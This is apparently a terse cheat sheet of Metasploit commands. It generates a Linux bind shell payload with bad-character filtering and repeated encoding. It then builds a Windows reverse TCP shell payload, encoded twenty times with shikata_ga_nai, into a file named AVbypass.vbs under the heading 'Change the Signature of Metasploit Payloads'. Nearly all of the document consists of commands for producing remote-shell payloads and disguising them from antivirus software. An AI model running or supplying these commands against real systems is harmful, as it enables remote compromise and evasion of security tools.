use payload/linux/x86/shell_bind_tcp
generate -h
generate
show encoders
encoder/x86/countdown
generate -e x86/countdown
generate -b '\x00'
generate -b '\x00\xa1\x66\x81'
Payload generation failed: No encoders encoded the buffer successfully.

generate -b '\x00\xa1\x66\x81' -i 5
generate -b '\x00\xa1\x66\x81' -i 5 -o lport=1234
generate -b '\x00\xa1\x66\x81' -i 5 -o lport=1234 -t java
generate -b '\x00\xa1\x66\x81' -i 5 -o lport=1234 -t java -f payload

Change the Signature of Metasploit Payloads
msfencode -h
msfencode -l
msfpayload windows/shell/reverse_tcp LHOST=192.168.1.101 R |msfencode -e x86/shikata_ga_nai -c 20 -t vbs > /root/AVbypass.vbs
msfpayload windows/shell/reverse_tcp LHOST 192.168.1.101 R
msfencode -e x86/shikata_ga_nai -c 20 -t vbs
> /root/AVbypass.vbs

cd /root
ls -l